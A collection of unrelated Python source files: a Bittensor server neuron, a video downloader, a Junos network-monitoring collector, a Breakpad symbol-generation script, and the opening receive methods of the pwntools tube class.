'emission': nn.emission,
}
# ---- console logging
bittensor.__console__.print('[green]Current Status:[/green]', data)
except Exception as e:
# --- Unknown error ----
logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
class Server:
def __init__( self, config: 'bittensor.config', gp_server):
r""" Initializes the neuron with the passed config.
"""
self.config = config
self.wallet = bittensor.wallet( config = config ).create().register()
self.subtensor = bittensor.subtensor ( config = self.config )
logger.success( self.subtensor )
ctx = mp.get_context('spawn')
self.forward_q = ctx.Queue()
self.manager = Manager()
self.events = self.manager.dict()
self.outputs = self.manager.dict()
self.axon = bittensor.axon (
config = self.config,
wallet = self.wallet,
forward_text = self.forward_text,
backward_text = lambda x : None,
blacklist = self.blacklist,
priority = self.priority
)
self.axon_pipe = DDPPipe(config, gp_server, self.wallet, self.forward_q, self.events, self.outputs )
self.timecheck = {}
self.subtensor = bittensor.subtensor ( config = self.config )
self.metagraph = bittensor.metagraph ( config = self.config, subtensor = self.subtensor )
self.futures = {}
self.last_sync_block = None
self.last_set_weight_block = None
# Instantiate the model we are going to serve on the network.
# Creating a threading lock for updates to the model
# Define our forward function.
def forward_text ( self, inputs_x):
r""" Forward function that is called when the axon recieves a forward request from other peers
Args:
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs to be forward processed.
Returns:
outputs (:obj:`torch.FloatTensor`):
The nucleus's outputs as a torch tensor of shape [batch_size, sequence_len, __network_dim__]
"""
result = None
request_id = id(inputs_x)
self.forward_q.put( (request_id, inputs_x) )
self.events[request_id] = self.manager.Event()
if self.events[request_id].wait(12):
result = self.outputs[request_id]
del self.events[request_id]
del self.outputs[request_id]
return result
def priority(self, pubkey:str, request_type:bittensor.proto.RequestType, inputs_x) -> float:
r"""Calculates the priority on requests based on stake and size of input
Args:
pubkey ( str, `required`):
The public key of the caller.
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs to be forward processed.
request_type ( bittensor.proto.RequestType, `required`):
the request type ('FORWARD' or 'BACKWARD').
"""
uid = self.metagraph.hotkeys.index(pubkey)
priority = self.metagraph.S[uid].item()/ sys.getsizeof(inputs_x)
return priority
def blacklist(self, pubkey:str, request_type:bittensor.proto.RequestType) -> bool:
r"""Axon security blacklisting, used to blacklist message from low stake members
Args:
pubkey ( str, `required`):
The public key of the caller.
request_type ( bittensor.proto.RequestType, `required`):
the request type ('FORWARD' or 'BACKWARD').
"""
# Check for stake
def stake_check() -> bool:
# If we allow non-registered requests return False = not blacklisted.
is_registered = pubkey in self.metagraph.hotkeys
if not is_registered:
if self.config.neuron.blacklist_allow_non_registered:
return False
else:
return True
# Check stake.
uid = self.metagraph.hotkeys.index(pubkey)
if request_type == bittensor.proto.RequestType.FORWARD:
if self.metagraph.S[uid].item() < self.config.neuron.blacklist.stake.forward:
return True
else:
return False
elif request_type == bittensor.proto.RequestType.BACKWARD:
if self.metagraph.S[uid].item() < self.config.neuron.blacklist.stake.backward:
return True
else:
return False
# Check for time
def time_check():
current_time = datetime.now()
if pubkey in self.timecheck.keys():
prev_time = self.timecheck[pubkey]
if current_time - prev_time >= timedelta(seconds=self.config.neuron.blacklist.time):
self.timecheck[pubkey] = current_time
return False
else:
self.timecheck[pubkey] = current_time
return True
else:
self.timecheck[pubkey] = current_time
return False
# Black list or not
if stake_check() or time_check():
return True
else:
return False
def run(self):
def serve_when_ready(serve_kwargs, pipe_ready):
r""" Start to serve Axon when DDP have started
Args:
serve_kwargs(map):
Arguments for serving axon.
pipe_ready(manager.Event):
The Event when the DDP is ready
"""
if pipe_ready.wait():
self.axon.start().serve(**serve_kwargs)
return
def sync(keyboard_interupt):
r""" Sync with metagraph and set weight to chain.
Args:
keyboard_interupt(manager.Event):
Whether we have tried to stop the program with keyboard_interupt.
"""
while not keyboard_interupt.is_set():
current_block = self.subtensor.get_current_block()
if (self.last_sync_block == None) or (current_block - self.last_sync_block > self.config.neuron.metagraph_sync):
self.last_sync_block = current_block
self.metagraph.sync()
bittensor.logging.success('Metagraph synced', sufix = f'{self.last_sync_block} --> {current_block}')
if (self.last_set_weight_block == None) or (current_block - self.last_set_weight_block > self.config.neuron.blocks_per_set_weights):
self.last_set_weight_block = current_block
chain_weights = torch.zeros(self.metagraph.n)
chain_weights [ self.uid ] = 1
did_set = self.subtensor.set_weights(
uids=self.metagraph.uids,
weights = chain_weights,
wait_for_inclusion = False,
wallet = self.wallet,
)
if did_set:
logger.success('Successfully set weights on the chain')
else:
logger.error('Failed to set weights on chain. (Timeout)')
time.sleep(self.config.neuron.check_sync_time)
try:
self.wallet.create()
self.subtensor.register( self.wallet )
self.metagraph.sync()
neuron = self.subtensor.neuron_for_pubkey(self.wallet.hotkey.ss58_address)
self.uid = neuron.uid
pipe_ready = self.manager.Event()
keyboard_interupt = self.manager.Event()
axon_start_thread = threading.Thread( target = serve_when_ready, args = ({'subtensor': self.subtensor}, pipe_ready) )
sync_thread = threading.Thread( target = sync, args = (keyboard_interupt, ))
axon_start_thread.start()
sync_thread.start()
self.axon_pipe.run_parallel(ready = pipe_ready)
# Just to keep this run function alive.
while True:
time.sleep(20)
except KeyboardInterrupt:
keyboard_interupt.set()
logger.success('Keyboard Interuped')
self.axon.stop()
axon_start_thread.join()
sync_thread.join()
except Exception as e:
# --- Unknown error ----
logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
|
videodown.py
|
# -*- coding: utf-8 -*-
import requests
from contextlib import closing
import time
# import Queue
# import hashlib
# import threading
import os
from fake_useragent import UserAgent
# import fake_useragent
def download_file(url, path):
# with closing(requests.get(url, stream=True)) as r:
ua = UserAgent()
headers = {'user-agent':ua.random}
print(headers)
# headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
r = requests.get(url, stream=True, headers = headers)
chunk_size = 1024 * 10
content_size = int(r.headers['content-length'])
# name = r.headers['content-disposition']
if os.path.exists(path) and os.path.getsize(path) >= content_size:
print("已下载")
return
print("开始下载")
with open(path, "wb") as f:
p = ProgressData(size=content_size, unit='Kb', block=chunk_size, file_name=path)
for chunk in r.iter_content(chunk_size=chunk_size):
f.write(chunk)
p.output()
class ProgressData(object):
def __init__(self, block,size, unit, file_name='', ):
self.file_name = file_name
self.block = block/1000.0
self.size = size/1000.0
self.unit = unit
self.count = 0
self.start = time.time()
def output(self):
self.end = time.time()
self.count += 1
speed = self.block/(self.end-self.start) if (self.end-self.start)>0 else 0
self.start = time.time()
loaded = self.count*self.block
progress = round(loaded/self.size, 4)
if loaded >= self.size:
print(u'%s下载完成\r\n'%self.file_name)
else:
print(u'{0}下载进度{1:.2f}{2}/{3:.2f}{4} {5:.2%} 下载速度{6:.2f}{7}/s'. \
format(self.file_name, loaded, self.unit, \
self.size, self.unit, progress, speed, self.unit))
print('%50s'%('/'*int((1-progress)*50)))
# queue = Queue.Queue()
# def run():
# while True:
# url = queue.get(timeout=100)
# if url is None:
# print(u'全下完啦')
# break
# h = hashlib.md5()
# h.update(url)
# name = h.hexdigest()
# path = 'e:/download/' + name + '.mp4'
# download_file(url, path)
#
#
# def get_url():
# queue.put(None)
# if __name__ == '__main__':
# get_url()
# for i in xrange(4):
# t = threading.Thread(target=run)
# t.daemon = True
# t.start()
|
junos_collector.py
|
import json
import logging
import logging.config
import threading
import time
import uuid
from copy import deepcopy
from datetime import datetime
from multiprocessing import JoinableQueue
import requests
import yaml
from jnpr.junos import Device
from jnpr.junos.exception import ConnectError, RpcError
# Constants
DATABASE_URL = 'http://0.0.0.0'
DATABASE_PORT = 5000
COLLECTION_INTERVAL = 60 # seconds
# Logging
logger = logging.getLogger(__name__)
class Message(object):
def __init__(self, endpoint, msg, headers):
self.endpoint = endpoint
self.event_msg = msg
self.headers = headers
def send_message(self):
requests.post(self.endpoint, json=self.event_msg, headers=self.headers)
logger.info('%s - %s - %s', self.event_msg['uuid'], self.event_msg['time'], self.event_msg['name'])
class JunosCollector(object):
def __init__(self, config_path):
"""Collector module for Junos RPC information, statistics and status
:param config_path: Location of the credentials for each network device
:type config_path: str
"""
self.connected_devices = {}
self.network_devices = {}
self.broken_devices = {}
self.db_event_endpoint = '{}:{}/create_event'.format(DATABASE_URL, DATABASE_PORT)
self.requests_queue = JoinableQueue(maxsize=0)
self._import_network_devices(config_path)
self.start_monitoring()
def empty_requests(self):
"""Checks for any outgoing events destined for the database and sends them"""
while True:
request = self.requests_queue.get()
request.send_message()
#self.requests_queue.task_done()
def start_monitoring(self):
"""Monitoring loop which collects information from each device
for a specified interval
"""
t_queue = threading.Thread(target=self.empty_requests)
t_queue.start()
while True:
threads = []
start_time = time.time()
self.check_broken_device()
t = threading.Thread(target=self.t_interface_statuses)
threads.append(t)
t = threading.Thread(target=self.t_bgp_peers)
threads.append(t)
t = threading.Thread(target=self.t_ldp_sessions)
threads.append(t)
t = threading.Thread(target=self.t_ospf_neighbors)
threads.append(t)
t = threading.Thread(target=self.t_pcep_statuses)
threads.append(t)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end_time = time.time()
duration = end_time - start_time
sleep_duration = COLLECTION_INTERVAL - int(duration)
if sleep_duration < 0:
sleep_duration = 0
time.sleep(sleep_duration)
t_queue.join()
def t_interface_statuses(self):
# Interface Status
device_interface_statuses = self.get_interface_status()
self.monitor_oper_status(device_interface_statuses)
self.monitor_admin_status(device_interface_statuses)
def t_bgp_peers(self):
# BGP Peers
bgp_down_count = self.get_bgp_peers()
self.monitor_bgp_peers(bgp_down_count)
def t_ldp_sessions(self):
# LDP Neighbors
ldp_neighbors = self.get_ldp_session()
self.monitor_ldp_session(ldp_neighbors)
def t_ospf_neighbors(self):
# OSPF Neighbors
ospf_neighbors = self.get_ospf_neighbors()
self.monitor_ospf_neighbors(ospf_neighbors)
ospf_interfaces = self.get_ospf_interfaces()
self.monitor_ospf_interfaces(ospf_interfaces)
def t_pcep_statuses(self):
# PCEP Status
pcep_statuses = self.get_pcep_statuses()
self.monitor_pcep_statuses(pcep_statuses)
def add_event_to_db(self, event_msg):
"""Sends collected information as events to the Database endpoint
:param event_msg: Event message that is compatible with the Database schema
:type event_msg: dict
"""
headers = {
'Content-Type': 'application/json',
}
requests.post(self.db_event_endpoint, json=event_msg, headers=headers)
# self.requests_queue.put(Message(self.db_event_endpoint, event_msg, headers))
def _import_network_devices(self, network_device_file):
"""Import the hostnames, username and password for each network device
and connect to the device
:param network_device_file: Location of the credentials for each network device
:type network_device_file: str
"""
logger.debug('Loading network devices into JunosCollector')
with open(network_device_file, 'r') as f:
import_devices = yaml.load(f.read())
for device in import_devices['devices']:
self.network_devices[device['name']] = device
logger.debug('Imported credentials for %s', device['name'])
for _, device in self.network_devices.items():
self._connect_to_device(device)
def _connect_to_device(self, device):
"""Connects to the network device via Netconf
:param device: Contains the necessary information to connect to the device
:type device: dict
:raises ConnectError: When a connection can not be establish to the device
"""
try:
logger.debug('Connecting to %s', device['ip'])
dev = Device(host=device['ip'], user=device['user'], password=device['password'], attempts=1, timeout=1)
dev.open()
logger.info('Successfully connected to %s', device['ip'])
except (ConnectError, RpcError) as e:
logger.error('%s', str(e))
self.broken_devices[device['name']] = dev
else:
self.connected_devices[device['name']] = dev
def _create_event(self, name, type, priority, body):
"""Serialises an Event object that conforms with the Event Database schema
:param name: Name of the Event
:type name: str
:param type Type of Event (eg. CLI/APPFORMIX)
:type type: str
:param priority: Priority of the Event (eg. INFORMATION/WARNING/CRITICAL)
:type priority: str
:param body: Any other extra information related to the Event
:type body: dict
:return: An Event Database compatible object
:rtype: dict
"""
event = {
'uuid': str(uuid.uuid4()),
'time': str(datetime.now().isoformat()),
'name': name,
'type': type,
'priority': priority,
'body': json.dumps(body),
}
return event
def check_broken_device(self):
for dev_name, dev in self.broken_devices.items():
try:
dev.open()
dev = self.broken_devices.pop(dev_name)
self.connected_devices[dev_name] = dev
self.send_connection_error(True, dev_name, 'Reconnected to device {}'.format(dev_name))
except Exception as e:
logger.error(e)
self.send_connection_error(False, dev_name, e)
def send_connection_error(self, status, device_name, msg):
if status is True:
event = self._create_event(name='connection.up.{}'.format(device_name),
type='connection',
priority='information',
body={'Information': str(msg)})
self.add_event_to_db(event)
else:
event = self._create_event(name='connection.down.{}'.format(device_name),
type='connection',
priority='critical',
body={'error': str(msg)})
self.add_event_to_db(event)
def get_interface_status(self):
device_interface_statuses = {}
rpc_replies = {}
to_monitor = ['ge-0/0/0', 'ge-0/0/1', 'ge-0/0/2', 'ge-0/0/0.0', 'ge-0/0/1.0', 'ge-0/0/2.0']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
try:
rpc_reply = connected_dev.rpc.get_interface_information(terse=True)
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
device_interface_statuses[dev_name] = []
interface_status = {}
logical_interfaces = rpc_reply.xpath('//physical-interface|//logical-interface')
for logical_interface in logical_interfaces:
name = logical_interface.xpath('.//name')[0].text.replace('\n', '')
if name not in to_monitor:
continue
admin_status = logical_interface.xpath('.//admin-status')[0].text.replace('\n', '')
oper_status = logical_interface.xpath('.//oper-status')[0].text.replace('\n', '')
interface_status[name] = {
'admin-status': admin_status,
'oper-status': oper_status,
}
device_interface_statuses[dev_name] = interface_status
return device_interface_statuses
def get_bgp_peers(self):
device_bgp_peer_count = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_bgp_summary_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
device_bgp_peer_count[dev_name] = {}
device_bgp_peer_count[dev_name]['peer-count'] = 0
device_bgp_peer_count[dev_name]['down-peer-count'] = 0
try:
peer_count_xpath = rpc_reply.xpath('//bgp-information/peer-count')
down_peer_count_xpath = rpc_reply.xpath('//bgp-information/down-peer-count')
if peer_count_xpath:
device_bgp_peer_count[dev_name]['peer-count'] = int(peer_count_xpath[0].text)
if peer_count_xpath:
device_bgp_peer_count[dev_name]['down-peer-count'] = int(down_peer_count_xpath[0].text)
except Exception as e:
logger.error(e)
return device_bgp_peer_count
def safely_set_device_broken(self, dev_name):
"""Removes the device from the list of connected devices
and places it into the broken device list.
This also handles the conflict of the devices already being removed
during multithreading.
:param dev_name: Name of the device
:type dev_name: str
"""
try:
dev = self.connected_devices.pop(dev_name)
self.broken_devices[dev_name] = dev
except KeyError:
# Probably already removed in another thread
pass
def get_ldp_session(self):
ldp_neighbors = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ldp_session_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
ldp_neighbors[dev_name] = {}
ldp_neighbors[dev_name]['ldp-session-state'] = ''
ldp_neighbors[dev_name]['ldp-neighbor-address'] = ''
try:
ldp_session_xpath = rpc_reply.xpath('//ldp-session-information/ldp-session')
for ldp_session in ldp_session_xpath:
ldp_neighbors[dev_name]['ldp-session-state'] = ldp_session.xpath('.//ldp-session-state')[0].text
ldp_neighbors[dev_name]['ldp-neighbor-address'] = ldp_session.xpath('.//ldp-neighbor-address')[0].text
except Exception as e:
logger.error(e)
return ldp_neighbors
def get_ospf_neighbors(self):
o_ospf_neighbors = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ospf_neighbor_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
o_ospf_neighbors[dev_name] = {}
o_ospf_neighbors[dev_name]['neighbor-address'] = ''
o_ospf_neighbors[dev_name]['ospf-neighbor-state'] = ''
o_ospf_neighbors[dev_name]['neighbor-id'] = ''
o_ospf_neighbors[dev_name]['interface-name'] = ''
try:
ospf_neighbor_xpath = rpc_reply.xpath('//ospf-neighbor-information/ospf-neighbor')
for ospf_neighbor in ospf_neighbor_xpath:
o_ospf_neighbors[dev_name]['neighbor-address'] = ospf_neighbor.xpath('.//neighbor-address')[0].text
o_ospf_neighbors[dev_name]['ospf-neighbor-state'] = ospf_neighbor.xpath('.//ospf-neighbor-state')[0].text
o_ospf_neighbors[dev_name]['neighbor-id'] = ospf_neighbor.xpath('.//neighbor-id')[0].text
o_ospf_neighbors[dev_name]['interface-name'] = ospf_neighbor.xpath('.//interface-name')[0].text
except Exception as e:
logger.error(e)
return o_ospf_neighbors
def get_ospf_interfaces(self):
o_ospf_interfaces = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
ospf_interfaces_template = {}
ospf_interfaces_template['interface-name'] = ''
ospf_interfaces_template['ospf-area'] = ''
ospf_interfaces_template['ospf-interface-state'] = ''
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_ospf_interface_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
try:
ospf_interfaces_xpath = rpc_reply.xpath('//ospf-interface-information/ospf-interface')
o_ospf_interfaces[dev_name] = []
for i, ospf_interface in enumerate(ospf_interfaces_xpath):
o_ospf_interface = deepcopy(ospf_interfaces_template)
o_ospf_interface['interface-name'] = ospf_interface.xpath('.//interface-name')[0].text
o_ospf_interface['ospf-area'] = ospf_interface.xpath('.//ospf-area')[0].text
o_ospf_interface['ospf-interface-state'] = ospf_interface.xpath('.//ospf-interface-state')[0].text
o_ospf_interfaces[dev_name].append(o_ospf_interface)
except Exception as e:
logger.error(e)
return o_ospf_interfaces
def get_pcep_statuses(self):
o_pcep_statuses = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3', 'PE1', 'PE2', 'PE3', 'PE4']
pcep_statuses_template = {}
pcep_statuses_template['session-name'] = ''
pcep_statuses_template['session-type'] = ''
pcep_statuses_template['session-provisioning'] = ''
pcep_statuses_template['session-status'] = ''
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_path_computation_client_status()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
try:
pcep_status_xpath = rpc_reply.xpath('//path-computation-client-status/pcc-status-sessions/pcc-status-sessions-entry')
o_pcep_statuses[dev_name] = []
for i, pcep_status in enumerate(pcep_status_xpath):
o_pcep_status = deepcopy(pcep_statuses_template)
o_pcep_status['session-name'] = pcep_status.xpath('.//session-name')[0].text
o_pcep_status['session-type'] = pcep_status.xpath('.//session-type')[0].text
o_pcep_status['session-provisioning'] = pcep_status.xpath('.//session-provisioning')[0].text
o_pcep_status['session-status'] = pcep_status.xpath('.//session-status')[0].text
o_pcep_statuses[dev_name].append(o_pcep_status)
except Exception as e:
logger.error(e)
return o_pcep_statuses
def monitor_oper_status(self, interface_status):
for device_name, interfaces in interface_status.items():
oper_status = True
for interface_name, interface in interfaces.items():
if interface['oper-status'] == 'down':
oper_status = False
break
if oper_status is False:
event = self._create_event(name='oper_status.interface.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='oper_status.interface.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: interfaces})
self.add_event_to_db(event)
def monitor_admin_status(self, interface_status):
for device_name, interfaces in interface_status.items():
admin_status = True
for interface_name, interface in interfaces.items():
if interface['admin-status'] == 'down':
admin_status = False
break
if admin_status is False:
event = self._create_event(name='admin_status.interface.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='admin_status.interface.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: interfaces})
self.add_event_to_db(event)
def monitor_bgp_peers(self, bgp_peer_count):
for device_name, bgp_peer_count in bgp_peer_count.items():
if bgp_peer_count['down-peer-count'] == 0:
event = self._create_event(name='bgp.peers.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: {
'up-peer-count': bgp_peer_count['peer-count'] - bgp_peer_count['down-peer-count'],
'down-peer-count': bgp_peer_count['down-peer-count'],
}})
self.add_event_to_db(event)
else:
event = self._create_event(name='bgp.peers.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: {
'up-peer-count': bgp_peer_count['peer-count'] - bgp_peer_count['down-peer-count'],
'down-peer-count': bgp_peer_count['down-peer-count'],
}})
self.add_event_to_db(event)
def monitor_ldp_session(self, ldp_neighbors):
for device_name, ldp_neighbor in ldp_neighbors.items():
if ldp_neighbor['ldp-session-state'] == 'Operational':
event = self._create_event(name='ldp.session.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ldp_neighbor})
self.add_event_to_db(event)
else:
event = self._create_event(name='ldp.session.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ldp_neighbor})
self.add_event_to_db(event)
def monitor_ospf_neighbors(self, ospf_neighbors):
for device_name, ospf_neighbor in ospf_neighbors.items():
if ospf_neighbor['ospf-neighbor-state'] == 'Full':
event = self._create_event(name='ospf.neighbors.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ospf_neighbor})
self.add_event_to_db(event)
else:
event = self._create_event(name='ospf.neighbors.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ospf_neighbor})
self.add_event_to_db(event)
def monitor_pcep_statuses(self, pcep_statuses):
for device_name, pcep_status in pcep_statuses.items():
status = True
for pcep_session in pcep_status:
if pcep_session['session-status'] != 'Up':
status = False
break
if status is True:
event = self._create_event(name='pcep.status.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: pcep_status})
self.add_event_to_db(event)
else:
event = self._create_event(name='pcep.status.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: pcep_status})
self.add_event_to_db(event)
def monitor_ospf_interfaces(self, d_ospf_interfaces):
for device_name, ospf_interfaces in d_ospf_interfaces.items():
status = True
for ospf_interface in ospf_interfaces:
if ospf_interface['ospf-interface-state'] == 'Down':
status = False
break
if status is True:
event = self._create_event(name='ospf.interfaces.up.{}'.format(device_name),
type='cli',
priority='information',
body={device_name: ospf_interfaces})
self.add_event_to_db(event)
else:
event = self._create_event(name='ospf.interfaces.down.{}'.format(device_name),
type='cli',
priority='critical',
body={device_name: ospf_interfaces})
self.add_event_to_db(event)
if __name__ == '__main__':
jc = JunosCollector(config_path='../config/devices.yaml')
|
generate_breakpad_symbols.py
|
#!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc. All rights reserved.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert pdb to sym for given directories"""
import errno
import glob
import optparse
import os
import Queue
import re
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
SOURCE_ROOT=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
DUMP_SYMS=os.path.join(SOURCE_ROOT, 'vendor', 'breakpad', 'dump_syms.exe')
def GetCommandOutput(command):
"""Runs the command list, returning its output.
Prints the given command (which should be a list of one or more strings),
then runs it and returns its output (stdout) as a string.
From chromium_utils.
"""
devnull = open(os.devnull, 'w')
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
bufsize=1)
output = proc.communicate()[0]
return output
def mkdir_p(path):
"""Simulates mkdir -p."""
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def RegisterRequiredDll():
register = os.path.join(os.path.dirname(__file__), 'register_msdia80_dll.js')
subprocess.check_call(['node.exe', register]);
def GenerateSymbols(options, binaries):
"""Dumps the symbols of binary and places them in the given directory."""
queue = Queue.Queue()
print_lock = threading.Lock()
def _Worker():
while True:
binary = queue.get()
if options.verbose:
with print_lock:
print "Generating symbols for %s" % binary
syms = GetCommandOutput([DUMP_SYMS, binary])
module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-Fa-f]+) (.*)\r\n", syms)
if module_line == None:
with print_lock:
print "Failed to get symbols for %s" % binary
queue.task_done()
continue
output_path = os.path.join(options.symbols_dir, module_line.group(2),
module_line.group(1))
mkdir_p(output_path)
symbol_file = "%s.sym" % module_line.group(2)[:-4] # strip .pdb
f = open(os.path.join(output_path, symbol_file), 'w')
f.write(syms)
f.close()
queue.task_done()
for binary in binaries:
queue.put(binary)
for _ in range(options.jobs):
t = threading.Thread(target=_Worker)
t.daemon = True
t.start()
queue.join()
def main():
parser = optparse.OptionParser()
parser.add_option('', '--symbols-dir', default='',
help='The directory where to write the symbols file.')
parser.add_option('', '--clear', default=False, action='store_true',
help='Clear the symbols directory before writing new '
'symbols.')
parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
type='int', help='Number of parallel tasks to run.')
parser.add_option('-v', '--verbose', action='store_true',
help='Print verbose status output.')
(options, directories) = parser.parse_args()
if not options.symbols_dir:
print "Required option --symbols-dir missing."
return 1
if options.clear:
try:
shutil.rmtree(options.symbols_dir)
except:
pass
pdbs = []
for directory in directories:
pdbs += glob.glob(os.path.join(directory, '*.exe.pdb'))
pdbs += glob.glob(os.path.join(directory, '*.dll.pdb'))
RegisterRequiredDll();
GenerateSymbols(options, pdbs)
return 0
if '__main__' == __name__:
sys.exit(main())
|
tube.py
|
# -*- coding: utf-8 -*-
from .buffer import Buffer
from ..timeout import Timeout
from .. import term, atexit, context
from ..util import misc, fiddling
from ..log import getLogger, getPerformanceLogger
import re, threading, sys, time, subprocess, logging, string
log = getLogger(__name__)
dumplog = getPerformanceLogger(__name__ + '.dump')
class tube(Timeout):
"""
Container of all the tube functions common to sockets, TTYs and SSH connetions.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default):
super(tube, self).__init__(timeout)
self.buffer = Buffer()
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(4096)
if data and dumplog.isEnabledFor(logging.DEBUG):
dumplog.debug('Received %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
dumplog.indented(repr(line), level = logging.DEBUG)
else:
dumplog.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = 4096, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
Recieves one chunk of from the internal buffer or from the OS if the
buffer is empty.
"""
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
Recieves exactly `n` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
